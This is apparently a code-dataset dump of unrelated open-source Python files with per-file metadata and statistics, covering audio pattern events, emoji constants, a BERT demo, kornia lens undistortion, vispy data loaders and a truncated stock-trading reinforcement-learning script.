return {}
| 31.587629
| 87
| 0.616841
| 310
| 3,064
| 5.903226
| 0.251613
| 0.071038
| 0.087432
| 0.10929
| 0.329508
| 0.236066
| 0.212022
| 0.212022
| 0.212022
| 0.212022
| 0
| 0
| 0.262402
| 3,064
| 96
| 88
| 31.916667
| 0.809735
| 0
| 0
| 0.253165
| 0
| 0
| 0.234987
| 0.152415
| 0
| 0
| 0
| 0
| 0
| 1
| 0.075949
| false
| 0.037975
| 0.063291
| 0.050633
| 0.379747
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
8805528dd519906fc019a797eb45969b31e9b633
| 7,470
|
py
|
Python
|
supriya/patterns/NoteEvent.py
|
deeuu/supriya
|
14fcb5316eccb4dafbe498932ceff56e1abb9d27
|
[
"MIT"
] | null | null | null |
supriya/patterns/NoteEvent.py
|
deeuu/supriya
|
14fcb5316eccb4dafbe498932ceff56e1abb9d27
|
[
"MIT"
] | null | null | null |
supriya/patterns/NoteEvent.py
|
deeuu/supriya
|
14fcb5316eccb4dafbe498932ceff56e1abb9d27
|
[
"MIT"
] | null | null | null |
import uuid
import supriya.commands
import supriya.realtime
from supriya.patterns.Event import Event
class NoteEvent(Event):
### CLASS VARIABLES ###
__slots__ = ()
### INITIALIZER ###
def __init__(
self,
add_action=None,
delta=None,
duration=None,
is_stop=True,
synthdef=None,
target_node=None,
uuid=None,
**settings,
):
if add_action is not None:
add_action = supriya.AddAction.from_expr(add_action)
Event.__init__(
self,
add_action=add_action,
delta=delta,
duration=duration,
is_stop=bool(is_stop),
synthdef=synthdef,
target_node=target_node,
uuid=uuid,
**settings,
)
### PRIVATE METHODS ###
def _perform_nonrealtime(self, session, uuids, offset, maximum_offset=None):
import supriya.assets.synthdefs
settings = self.settings.copy() # Do not mutate in place.
synthdef = self.get("synthdef", supriya.assets.synthdefs.default)
synthdef = synthdef or supriya.assets.synthdefs.default
synth_uuid = self.get("uuid", uuid.uuid4())
is_stop = self.get("is_stop")
duration = self.get("duration")
if duration is None:
duration = 1
if "duration" in settings:
duration = settings.pop("duration")
dictionaries = self._expand(
settings, synthdef, uuids, realtime=False, synth_parameters_only=True
)
if synth_uuid not in uuids:
# Begin a Pbind or Pmono synth
target_node = self["target_node"]
if isinstance(target_node, uuid.UUID) and target_node in uuids:
target_node = uuids[target_node]
prototype = (supriya.nonrealtime.Session, supriya.nonrealtime.Node)
if not isinstance(target_node, prototype):
target_node = session
synths = []
with session.at(offset):
for dictionary in dictionaries:
synth = target_node.add_synth(
add_action=self["add_action"],
duration=duration,
synthdef=synthdef,
**dictionary,
)
synths.append(synth)
if not is_stop:
uuids[synth_uuid] = tuple(synths)
else:
# Extend and make settings on a Pmono synth
synths = uuids[synth_uuid]
stop_offset = offset + duration
for synth, dictionary in zip(synths, dictionaries):
duration = stop_offset - synth.start_offset
synth.set_duration(duration)
with session.at(offset):
for key, value in dictionary.items():
synth[key] = value
return offset + max(self.delta, self.get("duration", 0))
def _perform_realtime(self, index=0, server=None, timestamp=0, uuids=None):
import supriya.assets.synthdefs
import supriya.patterns
synth_uuid = self.get("uuid") or uuid.uuid4()
synthdef = self.get("synthdef", supriya.assets.synthdefs.default)
synthdef = synthdef or supriya.assets.synthdefs.default
is_stop = self.get("is_stop")
duration = self["duration"]
if duration is None:
duration = 1
dictionaries = self._expand(self.settings, synthdef, uuids)
first_visit = False
if synth_uuid not in uuids:
first_visit = True
node_ids = {
server.node_id_allocator.allocate_node_id(): None
for _ in range(len(dictionaries))
}
uuids[synth_uuid] = node_ids
start_product = self._build_start_bundle(
dictionaries, first_visit, index, synth_uuid, synthdef, timestamp, uuids
)
if self.get("duration"):
if is_stop:
stop_product = self._build_stop_bundle(
index, synth_uuid, synthdef, timestamp, uuids
)
else:
stop_product = supriya.patterns.EventProduct(
event=None,
index=index,
is_stop=True,
requests=(),
timestamp=timestamp + duration,
uuid=None,
)
return [start_product, stop_product]
else:
uuids.pop(synth_uuid)
return [start_product]
def _build_start_bundle(
self, dictionaries, first_visit, index, synth_uuid, synthdef, timestamp, uuids
):
import supriya.patterns
requests = []
node_ids = uuids[synth_uuid]
if first_visit:
for node_id, dictionary in zip(node_ids, dictionaries):
add_action = dictionary.pop("add_action")
target_node = dictionary.pop("target_node")
if target_node is None:
target_node = 1
synth_kwargs = {
key: value
for key, value in dictionary.items()
if key in synthdef.parameter_names
}
request = supriya.commands.SynthNewRequest(
add_action=add_action,
node_id=node_id,
synthdef=synthdef,
target_node_id=target_node,
**synth_kwargs,
)
requests.append(request)
synth = supriya.realtime.Synth(synthdef)
node_ids[node_id] = synth
else:
for node_id, dictionary in zip(node_ids, dictionaries):
synth_kwargs = {
key: value
for key, value in dictionary.items()
if key in synthdef.parameter_names
}
request = supriya.commands.NodeSetRequest(
node_id=node_id, **synth_kwargs
)
requests.append(request)
event_product = supriya.patterns.EventProduct(
event=self,
index=index,
is_stop=False,
requests=requests,
timestamp=timestamp,
uuid=synth_uuid,
)
return event_product
def _build_stop_bundle(self, index, synth_uuid, synthdef, timestamp, uuids):
import supriya.patterns
import supriya.synthdefs
duration = self["duration"]
if duration is None:
duration = 1
requests = []
timestamp = timestamp + duration
node_ids = sorted(uuids[synth_uuid])
if synthdef.has_gate:
for node_id in node_ids:
request = supriya.commands.NodeSetRequest(node_id=node_id, gate=0)
requests.append(request)
elif any(x >= supriya.DoneAction.FREE_SYNTH for x in synthdef.done_actions):
pass
else:
request = supriya.commands.NodeFreeRequest(node_ids=node_ids)
requests.append(request)
event_product = supriya.patterns.EventProduct(
event=self,
index=index,
is_stop=True,
requests=requests,
timestamp=timestamp,
uuid=synth_uuid,
)
return event_product
| 35.571429
| 86
| 0.545382
| 740
| 7,470
| 5.306757
| 0.163514
| 0.045837
| 0.033613
| 0.029539
| 0.403871
| 0.346066
| 0.310924
| 0.302521
| 0.270945
| 0.176725
| 0
| 0.00215
| 0.377242
| 7,470
| 209
| 87
| 35.741627
| 0.842003
| 0.018876
| 0
| 0.409574
| 0
| 0
| 0.018612
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.026596
| false
| 0.005319
| 0.053191
| 0
| 0.117021
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
88055aadf736a00daf291c08df0121953d6b59c8
| 443
|
py
|
Python
|
emoji_utils.py
|
ApacheAA/LastSeen
|
1fe675b3ee3072d56e9fe094d1d80e1f7d876215
|
[
"MIT"
] | null | null | null |
emoji_utils.py
|
ApacheAA/LastSeen
|
1fe675b3ee3072d56e9fe094d1d80e1f7d876215
|
[
"MIT"
] | null | null | null |
emoji_utils.py
|
ApacheAA/LastSeen
|
1fe675b3ee3072d56e9fe094d1d80e1f7d876215
|
[
"MIT"
] | 1
|
2021-04-04T02:46:10.000Z
|
2021-04-04T02:46:10.000Z
|
# unicode digit emojis
# digits from '0' to '9'
zero_digit_code = zd = 48
# excluded digits
excl_digits = [2, 4, 5, 7]
# variation selector-16 + combining enclosing keycap (turns a digit character into a keycap emoji)
udkc = '\U0000fe0f\U000020e3'
hours_0_9 = [chr(i) + udkc for i in range(zd, zd + 10)
if i - zd not in excl_digits]
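# e.g. chr(49) + udkc is '1' + U+FE0F + U+20E3, which renders as the keycap-1 emoji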
# number '10' emoji
hours_0_9.append('\U0001f51f')
# custom emojis from '11' to '23'
hours_11_23 = [str(i) for i in range(11, 24)]
vote = ('PLUS', 'MINUS')
edit = '\U0001F4DD'
| 26.058824
| 54
| 0.654628
| 77
| 443
| 3.636364
| 0.584416
| 0.085714
| 0.05
| 0.078571
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.143258
| 0.196388
| 443
| 17
| 55
| 26.058824
| 0.643258
| 0.293454
| 0
| 0
| 0
| 0
| 0.159609
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
88059d921ab4392734ab0df3051f19d38efd4fa5
| 1,131
|
py
|
Python
|
TFBertForMaskedLM/main.py
|
Sniper970119/ExampleForTransformers
|
3348525957c38b2a45898d4f4652879933503b25
|
[
"Apache-2.0"
] | 3
|
2021-01-24T04:55:46.000Z
|
2021-05-12T15:11:35.000Z
|
TFBertForMaskedLM/main.py
|
Sniper970119/ExampleForTransformers
|
3348525957c38b2a45898d4f4652879933503b25
|
[
"Apache-2.0"
] | null | null | null |
TFBertForMaskedLM/main.py
|
Sniper970119/ExampleForTransformers
|
3348525957c38b2a45898d4f4652879933503b25
|
[
"Apache-2.0"
] | 1
|
2021-01-24T04:55:53.000Z
|
2021-01-24T04:55:53.000Z
|
# -*- coding:utf-8 -*-
"""
┏┛ ┻━━━━━┛ ┻┓
┃ ┃
┃ ━ ┃
┃ ┳┛ ┗┳ ┃
┃ ┃
┃ ┻ ┃
┃ ┃
┗━┓ ┏━━━┛
┃ ┃ Divine beast, bless
┃ ┃ this code to be BUG-free!
┃ ┗━━━━━━━━━┓
┃CREATE BY SNIPER┣┓
┃ ┏┛
┗━┓ ┓ ┏━━━┳ ┓ ┏━┛
┃ ┫ ┫ ┃ ┫ ┫
┗━┻━┛ ┗━┻━┛
"""
import tensorflow as tf
import numpy as np
for gpu in tf.config.experimental.list_physical_devices('GPU'):
tf.config.experimental.set_memory_growth(gpu, True)
from transformers import BertTokenizer, TFBertForMaskedLM
tokenizer = BertTokenizer.from_pretrained('bert-base-cased')
model = TFBertForMaskedLM.from_pretrained('bert-base-cased', return_dict=True)
inputs = tokenizer("The capital of France is [MASK].", return_tensors="tf")
outputs = model(inputs)
logits = outputs.logits
output = np.argmax(logits[0][6])
o1 = tokenizer.decode(int(output))
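# Hedged note (not in the original): the hard-coded indices 6 and 4 are the positions of the [MASK]
# token in each tokenized sentence; they could instead be looked up programmatically, e.g.:
#   mask_index = int(tf.where(inputs["input_ids"][0] == tokenizer.mask_token_id)[0][0])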
inputs = tokenizer("The capital of [MASK] is BeiJing.", return_tensors="tf")
outputs = model(inputs)
logits = outputs.logits
output = np.argmax(logits[0][4])
o2 = tokenizer.decode(int(output))
print(o1, o2)
| 21.75
| 78
| 0.546419
| 157
| 1,131
| 4.43949
| 0.484076
| 0.028694
| 0.017217
| 0.063128
| 0.364419
| 0.209469
| 0.209469
| 0.209469
| 0.209469
| 0.209469
| 0
| 0.008547
| 0.275862
| 1,131
| 51
| 79
| 22.176471
| 0.735043
| 0.227233
| 0
| 0.222222
| 0
| 0
| 0.13264
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.166667
| 0
| 0.166667
| 0.055556
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
88063bdddf555a3761172dbc965029eec4f02090
| 6,071
|
py
|
Python
|
kornia/geometry/calibration/undistort.py
|
belltailjp/kornia
|
cfa3b6823d55e276893847f1c3f06ddf108c606a
|
[
"ECL-2.0",
"Apache-2.0"
] | 1
|
2022-01-06T00:36:04.000Z
|
2022-01-06T00:36:04.000Z
|
kornia/geometry/calibration/undistort.py
|
belltailjp/kornia
|
cfa3b6823d55e276893847f1c3f06ddf108c606a
|
[
"ECL-2.0",
"Apache-2.0"
] | 12
|
2021-09-26T14:07:49.000Z
|
2022-03-20T14:08:08.000Z
|
kornia/geometry/calibration/undistort.py
|
belltailjp/kornia
|
cfa3b6823d55e276893847f1c3f06ddf108c606a
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
import torch
from kornia.geometry.linalg import transform_points
from kornia.geometry.transform import remap
from kornia.utils import create_meshgrid
from .distort import distort_points, tilt_projection
# Based on https://github.com/opencv/opencv/blob/master/modules/calib3d/src/undistort.dispatch.cpp#L384
def undistort_points(points: torch.Tensor, K: torch.Tensor, dist: torch.Tensor) -> torch.Tensor:
r"""Compensate for lens distortion a set of 2D image points.
Radial :math:`(k_1, k_2, k_3, k_4, k_4, k_6)`,
tangential :math:`(p_1, p_2)`, thin prism :math:`(s_1, s_2, s_3, s_4)`, and tilt :math:`(\tau_x, \tau_y)`
distortion models are considered in this function.
Args:
points: Input image points with shape :math:`(*, N, 2)`.
K: Intrinsic camera matrix with shape :math:`(*, 3, 3)`.
dist: Distortion coefficients
:math:`(k_1,k_2,p_1,p_2[,k_3[,k_4,k_5,k_6[,s_1,s_2,s_3,s_4[,\tau_x,\tau_y]]]])`. This is
a vector with 4, 5, 8, 12 or 14 elements with shape :math:`(*, n)`.
Returns:
Undistorted 2D points with shape :math:`(*, N, 2)`.
Example:
>>> _ = torch.manual_seed(0)
>>> x = torch.rand(1, 4, 2)
>>> K = torch.eye(3)[None]
>>> dist = torch.rand(1, 4)
>>> undistort_points(x, K, dist)
tensor([[[-0.1513, -0.1165],
[ 0.0711, 0.1100],
[-0.0697, 0.0228],
[-0.1843, -0.1606]]])
"""
if points.dim() < 2 and points.shape[-1] != 2:
raise ValueError(f'points shape is invalid. Got {points.shape}.')
if K.shape[-2:] != (3, 3):
raise ValueError(f'K matrix shape is invalid. Got {K.shape}.')
if dist.shape[-1] not in [4, 5, 8, 12, 14]:
raise ValueError(f"Invalid number of distortion coefficients. Got {dist.shape[-1]}")
# Adding zeros to obtain vector with 14 coeffs.
if dist.shape[-1] < 14:
dist = torch.nn.functional.pad(dist, [0, 14 - dist.shape[-1]])
# Convert 2D points from pixels to normalized camera coordinates
cx: torch.Tensor = K[..., 0:1, 2] # principal point in x (Bx1)
cy: torch.Tensor = K[..., 1:2, 2] # principal point in y (Bx1)
fx: torch.Tensor = K[..., 0:1, 0] # focal in x (Bx1)
fy: torch.Tensor = K[..., 1:2, 1] # focal in y (Bx1)
# This is equivalent to K^-1 [u,v,1]^T
x: torch.Tensor = (points[..., 0] - cx) / fx # (BxN - Bx1)/Bx1 -> BxN
y: torch.Tensor = (points[..., 1] - cy) / fy # (BxN - Bx1)/Bx1 -> BxN
# Compensate for tilt distortion
if torch.any(dist[..., 12] != 0) or torch.any(dist[..., 13] != 0):
inv_tilt = tilt_projection(dist[..., 12], dist[..., 13], True)
# Transposed untilt points (instead of [x,y,1]^T, we obtain [x,y,1])
x, y = transform_points(inv_tilt, torch.stack([x, y], dim=-1)).unbind(-1)
# Iteratively undistort points
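# Hedged explanation (added, not in the original): each pass applies the fixed-point update
#   x_{k+1} = (x0 - deltaX(x_k, y_k)) * (1 + k4*r^2 + k5*r^4 + k6*r^6) / (1 + k1*r^2 + k2*r^4 + k3*r^6)
# (and similarly for y), approximately inverting the rational radial + tangential + thin-prism model;
# the fixed count of 5 passes mirrors the reference OpenCV implementation.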
x0, y0 = x, y
for _ in range(5):
r2 = x * x + y * y
inv_rad_poly = (1 + dist[..., 5:6] * r2 + dist[..., 6:7] * r2 * r2 + dist[..., 7:8] * r2 ** 3) / (
1 + dist[..., 0:1] * r2 + dist[..., 1:2] * r2 * r2 + dist[..., 4:5] * r2 ** 3
)
deltaX = (
2 * dist[..., 2:3] * x * y
+ dist[..., 3:4] * (r2 + 2 * x * x)
+ dist[..., 8:9] * r2
+ dist[..., 9:10] * r2 * r2
)
deltaY = (
dist[..., 2:3] * (r2 + 2 * y * y)
+ 2 * dist[..., 3:4] * x * y
+ dist[..., 10:11] * r2
+ dist[..., 11:12] * r2 * r2
)
x = (x0 - deltaX) * inv_rad_poly
y = (y0 - deltaY) * inv_rad_poly
# Convert points from normalized camera coordinates to pixel coordinates
x = fx * x + cx
y = fy * y + cy
return torch.stack([x, y], -1)
# Based on https://github.com/opencv/opencv/blob/master/modules/calib3d/src/undistort.dispatch.cpp#L287
def undistort_image(image: torch.Tensor, K: torch.Tensor, dist: torch.Tensor) -> torch.Tensor:
r"""Compensate an image for lens distortion.
Radial :math:`(k_1, k_2, k_3, k_4, k_4, k_6)`,
tangential :math:`(p_1, p_2)`, thin prism :math:`(s_1, s_2, s_3, s_4)`, and tilt :math:`(\tau_x, \tau_y)`
distortion models are considered in this function.
Args:
image: Input image with shape :math:`(*, C, H, W)`.
K: Intrinsic camera matrix with shape :math:`(*, 3, 3)`.
dist: Distortion coefficients
:math:`(k_1,k_2,p_1,p_2[,k_3[,k_4,k_5,k_6[,s_1,s_2,s_3,s_4[,\tau_x,\tau_y]]]])`. This is
a vector with 4, 5, 8, 12 or 14 elements with shape :math:`(*, n)`.
Returns:
Undistorted image with shape :math:`(*, C, H, W)`.
Example:
>>> img = torch.rand(1, 3, 5, 5)
>>> K = torch.eye(3)[None]
>>> dist_coeff = torch.rand(4)
>>> out = undistort_image(img, K, dist_coeff)
>>> out.shape
torch.Size([1, 3, 5, 5])
"""
    if len(image.shape) < 4:
raise ValueError(f"Image shape is invalid. Got: {image.shape}.")
if K.shape[-2:] != (3, 3):
raise ValueError(f'K matrix shape is invalid. Got {K.shape}.')
if dist.shape[-1] not in [4, 5, 8, 12, 14]:
raise ValueError(f'Invalid number of distortion coefficients. Got {dist.shape[-1]}.')
if not image.is_floating_point():
raise ValueError(f'Invalid input image data type. Input should be float. Got {image.dtype}.')
B, _, rows, cols = image.shape
# Create point coordinates for each pixel of the image
xy_grid: torch.Tensor = create_meshgrid(rows, cols, False, image.device, image.dtype)
pts = xy_grid.reshape(-1, 2) # (rows*cols)x2 matrix of pixel coordinates
# Distort points and define maps
ptsd: torch.Tensor = distort_points(pts, K, dist) # Bx(rows*cols)x2
mapx: torch.Tensor = ptsd[..., 0].reshape(B, rows, cols) # B x rows x cols, float
mapy: torch.Tensor = ptsd[..., 1].reshape(B, rows, cols) # B x rows x cols, float
# Remap image to undistort
out = remap(image, mapx, mapy, align_corners=True)
return out
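# Illustrative usage sketch (an assumption, not from the original docs): a single frame from a
# hypothetical camera with realistic focal lengths and principal point, rather than the identity
# K used in the doctest above.
def _example_undistort_frame(frame: torch.Tensor) -> torch.Tensor:
    # frame: a 1xCxHxW float tensor from one (hypothetical) camera.
    K = torch.tensor([[[500.0, 0.0, 320.0], [0.0, 500.0, 240.0], [0.0, 0.0, 1.0]]])
    dist = torch.tensor([[-0.2, 0.05, 0.0, 0.0]])  # mild barrel distortion, no tangential terms
    return undistort_image(frame, K, dist)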
| 39.679739
| 109
| 0.567452
| 954
| 6,071
| 3.519916
| 0.205451
| 0.058964
| 0.030971
| 0.008338
| 0.419297
| 0.402621
| 0.379393
| 0.366885
| 0.366885
| 0.366885
| 0
| 0.06257
| 0.260254
| 6,071
| 152
| 110
| 39.940789
| 0.685148
| 0.447373
| 0
| 0.092308
| 0
| 0
| 0.116677
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.030769
| false
| 0
| 0.076923
| 0
| 0.138462
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
8808d379a8ce975e29508dea21a42397452fc552
| 2,489
|
py
|
Python
|
vispy/io/datasets.py
|
hmaarrfk/vispy
|
7f3f6f60c8462bb8a3a8fa03344a2e6990b86eb2
|
[
"BSD-3-Clause"
] | 2,617
|
2015-01-02T07:52:18.000Z
|
2022-03-29T19:31:15.000Z
|
vispy/io/datasets.py
|
hmaarrfk/vispy
|
7f3f6f60c8462bb8a3a8fa03344a2e6990b86eb2
|
[
"BSD-3-Clause"
] | 1,674
|
2015-01-01T00:36:08.000Z
|
2022-03-31T19:35:56.000Z
|
vispy/io/datasets.py
|
hmaarrfk/vispy
|
7f3f6f60c8462bb8a3a8fa03344a2e6990b86eb2
|
[
"BSD-3-Clause"
] | 719
|
2015-01-10T14:25:00.000Z
|
2022-03-02T13:24:56.000Z
|
# -*- coding: utf-8 -*-
# Copyright (c) Vispy Development Team. All Rights Reserved.
# Distributed under the (new) BSD License. See LICENSE.txt for more info.
import numpy as np
from os import path as op
from ..util import load_data_file
# This is the package data dir, not the dir for config, etc.
DATA_DIR = op.join(op.dirname(__file__), '_data')
def load_iris():
"""Load the iris dataset
Returns
-------
iris : NpzFile
data['data'] : a (150, 4) NumPy array with the iris' features
data['group'] : a (150,) NumPy array with the iris' group
"""
return np.load(load_data_file('iris/iris.npz',
force_download='2014-09-04'))
def load_crate():
"""Load an image of a crate
Returns
-------
crate : array
256x256x3 crate image.
"""
return np.load(load_data_file('orig/crate.npz'))['crate']
def pack_unit(value):
"""Packs float values between [0,1] into 4 unsigned int8
Returns
-------
pack: array
packed interpolation kernel
"""
pack = np.zeros(value.shape + (4,), dtype=np.ubyte)
for i in range(4):
value, pack[..., i] = np.modf(value * 256.)
return pack
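# Hypothetical inverse of pack_unit (not part of the original module), included only to
# illustrate the base-256 encoding above: byte i holds one "digit" of the fraction, so the
# float is recovered as sum(pack[..., i] / 256**(i + 1)).
def unpack_unit_example(value_packed):
    """Recover the floats in [0, 1] that pack_unit encoded into 4 unsigned int8."""
    value = np.zeros(value_packed.shape[:-1], dtype=np.float64)
    for i in range(4):
        value = value + value_packed[..., i] / 256. ** (i + 1)
    return value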
def pack_ieee(value):
"""Packs float ieee binary representation into 4 unsigned int8
Returns
-------
pack: array
packed interpolation kernel
"""
    return np.frombuffer(value.tobytes(),
                         np.ubyte).reshape((value.shape + (4,)))
def load_spatial_filters(packed=True):
"""Load spatial-filters kernel
Parameters
----------
packed : bool
Whether or not the data should be in "packed" representation
for use in GLSL code.
Returns
-------
kernel : array
16x1024x4 (packed float in rgba) or
16x1024 (unpacked float)
16 interpolation kernel with length 1024 each.
names : tuple of strings
Respective interpolation names, plus "Nearest" which does
not require a filter but can still be used
"""
names = ("Bilinear", "Hanning", "Hamming", "Hermite",
"Kaiser", "Quadric", "Bicubic", "CatRom",
"Mitchell", "Spline16", "Spline36", "Gaussian",
"Bessel", "Sinc", "Lanczos", "Blackman", "Nearest")
kernel = np.load(op.join(DATA_DIR, 'spatial-filters.npy'))
if packed:
# convert the kernel to a packed representation
kernel = pack_unit(kernel)
return kernel, names
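# Illustrative usage sketch (assumes the bundled 'spatial-filters.npy' data file is present;
# the filter name below is just an example):
def _example_pick_kernel(name='Bicubic'):
    kernel, names = load_spatial_filters(packed=False)  # 16x1024 float kernels
    if name == 'Nearest':
        return None  # "Nearest" needs no interpolation kernel
    return kernel[names.index(name)]  # the 1024-tap kernel for the requested filter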
| 26.2
| 73
| 0.60225
| 313
| 2,489
| 4.722045
| 0.485623
| 0.016238
| 0.024357
| 0.023004
| 0.139378
| 0.110961
| 0.078484
| 0.078484
| 0.078484
| 0.078484
| 0
| 0.032009
| 0.271997
| 2,489
| 94
| 74
| 26.478723
| 0.783664
| 0.482925
| 0
| 0
| 0
| 0
| 0.166968
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.192308
| false
| 0
| 0.115385
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
8809a9e20076798a2ad0ec40dc57152d0a032e41
| 13,731
|
py
|
Python
|
universal_portfolio/knapsack.py
|
jehung/universal_portfolio
|
de731a6166ff057c8d6f3f73f80f9aca151805fa
|
[
"CC-BY-3.0"
] | 14
|
2017-03-01T07:54:17.000Z
|
2021-10-10T11:07:56.000Z
|
universal_portfolio/knapsack.py
|
jehung/universal_portfolio
|
de731a6166ff057c8d6f3f73f80f9aca151805fa
|
[
"CC-BY-3.0"
] | null | null | null |
universal_portfolio/knapsack.py
|
jehung/universal_portfolio
|
de731a6166ff057c8d6f3f73f80f9aca151805fa
|
[
"CC-BY-3.0"
] | 3
|
2017-06-27T10:18:03.000Z
|
2020-07-03T01:29:56.000Z
|
# -*- coding: utf-8 -*-
from __future__ import print_function
import numpy as np
np.random.seed(1335) # for reproducibility
np.set_printoptions(precision=5, suppress=True, linewidth=150)
import os
import pandas as pd
import backtest as twp
from matplotlib import pyplot as plt
from sklearn import metrics, preprocessing
from talib.abstract import *
from sklearn.externals import joblib
import quandl
import random, timeit
from sklearn import preprocessing
from keras.models import Sequential
from keras.layers.core import Dense, Dropout, Activation
from keras.layers.recurrent import LSTM
from keras.optimizers import RMSprop, Adam
'''
Name: The Self Learning Quant, Example 3
Author: Daniel Zakrisson
Created: 30/03/2016
Copyright: (c) Daniel Zakrisson 2016
Licence: BSD
Requirements:
Numpy
Pandas
MatplotLib
scikit-learn
TA-Lib, instructions at https://mrjbq7.github.io/ta-lib/install.html
Keras, https://keras.io/
Quandl, https://www.quandl.com/tools/python
backtest.py from the TWP library. Download backtest.py and put it in the same folder
/plt: create a subfolder with this name in the same directory; plot files will be saved there
'''
def get_ticker(x):
return x.split('/')[-1].split('.')[0]
def read_file(file, test=None):
scaler = preprocessing.MinMaxScaler()
d = pd.read_csv(file).set_index('Date')
d.fillna(0, inplace=True)
ticker = get_ticker(file)
d['ticker'] = ticker
d.rename(columns={'Open': 'open', 'High': 'high', 'Low': 'low', 'Close': 'close', 'Adj Close': 'adj_close',
'Volume (BTC)': 'volume'},
inplace=True)
x_train = d.iloc[:-100, ]
x_test = d.iloc[-100:, ]
if test:
return x_test, ticker
else:
return x_train, ticker
# Initialize first state, all items are placed deterministically
def init_state(file, test):
d, ticker = read_file(file, test=test)
xdata = pd.DataFrame()
scaler = preprocessing.StandardScaler()
xdata['adj_close'] = d['adj_close'] # .values
xdata['diff'] = xdata['adj_close'].diff(periods=1)
xdata['diff'].fillna(0, inplace=True)
xdata['sma15'] = SMA(d, timeperiod=15)
xdata['sma60'] = SMA(d, timeperiod=60)
xdata['rsi'] = RSI(d, timeperiod=14)
xdata['atr'] = ATR(d, timeperiod=14)
xdata.fillna(0, inplace=True)
# --- Preprocess data
# xdata = np.column_stack((close, diff, sma15, close - sma15, sma15 - sma60, rsi, atr))
xdata = pd.DataFrame(scaler.fit_transform(xdata), columns=xdata.columns)
xdata['ticker'] = ticker
pivot_columns = xdata.columns[0:-1]
pivot = xdata.pivot_table(index=d.index, columns='ticker', values=pivot_columns) # Make a pivot table from the data
pivot.columns = [s1 + '-' + s2 for (s1, s2) in pivot.columns.tolist()]
return pivot
def all_init_data(test=False):
filepath = 'util/stock_dfs/'
all = []
scaler = preprocessing.StandardScaler()
for f in os.listdir(filepath):
datapath = os.path.join(filepath, f)
if datapath.endswith('.csv'):
# print(datapath)
Res = init_state(datapath, test=test)
all.append(Res)
all = pd.concat(all, axis=1)
all.fillna(0, inplace=True)
closecol = [col for col in all.columns if 'adj_close' in col]
close = all[closecol].values
# xdata = np.column_stack((close, diff, sma15, close-sma15, sma15-sma60, rsi, atr))
xdata = np.vstack(all.values)
xdata = np.nan_to_num(xdata)
if test == False:
scaler = preprocessing.StandardScaler()
xdata = np.expand_dims(scaler.fit_transform(xdata), axis=1)
joblib.dump(scaler, 'data/scaler.pkl')
else:
scaler = joblib.load('data/scaler.pkl')
xdata = np.expand_dims(scaler.fit_transform(xdata), axis=1)
state = xdata[0:1, 0:1, :]
return state, xdata, close
# Take Action
def take_action(state, xdata, action, signal, time_step):
# this should generate a list of trade signals that at evaluation time are fed to the backtester
    # the backtester should get a list of trade signals and a list of price data for the asset
# make necessary adjustments to state and then return it
time_step += 1
# if the current iteration is the last state ("terminal state") then set terminal_state to 1
if time_step + 1 == xdata.shape[0]:
state = xdata[time_step - 1:time_step, 0:1, :]
terminal_state = 1
signal.loc[time_step] = 0
return state, time_step, signal, terminal_state
# move the market data window one step forward
state = xdata[time_step - 1:time_step, 0:1, :]
# take action
if action == 1:
signal.loc[time_step] = 100
elif action == 2:
signal.loc[time_step] = -100
else:
signal.loc[time_step] = 0
# print(state)
terminal_state = 0
# print(signal)
return state, time_step, signal, terminal_state
# Get Reward, the reward is returned at the end of an episode
def get_reward(new_state, time_step, action, xdata, signal, terminal_state, eval=False, epoch=0):
reward = 0
signal.fillna(value=0, inplace=True)
if eval == False:
try:
bt = twp.Backtest(pd.Series(data=[x[0] for x in xdata[time_step - 2:time_step]], index=signal[time_step - 2:time_step].index.values),
signal[time_step - 2:time_step], signalType='shares')
reward = np.max((bt.data['price'].iloc[-1] - bt.data['price'].iloc[-2]) * bt.data['shares'].iloc[-1])
except:
pass
if terminal_state == 1 and eval == True:
bt = twp.Backtest(pd.Series(data=[x[0] for x in xdata], index=signal.index.values), signal, signalType='shares')
reward = bt.pnl.iloc[-1]
plt.figure(figsize=(9, 16))
bt.plotTrades()
plt.axvline(x=400, color='black', linestyle='--')
plt.text(250, 400, 'training data')
plt.text(450, 400, 'test data')
plt.suptitle(str(epoch))
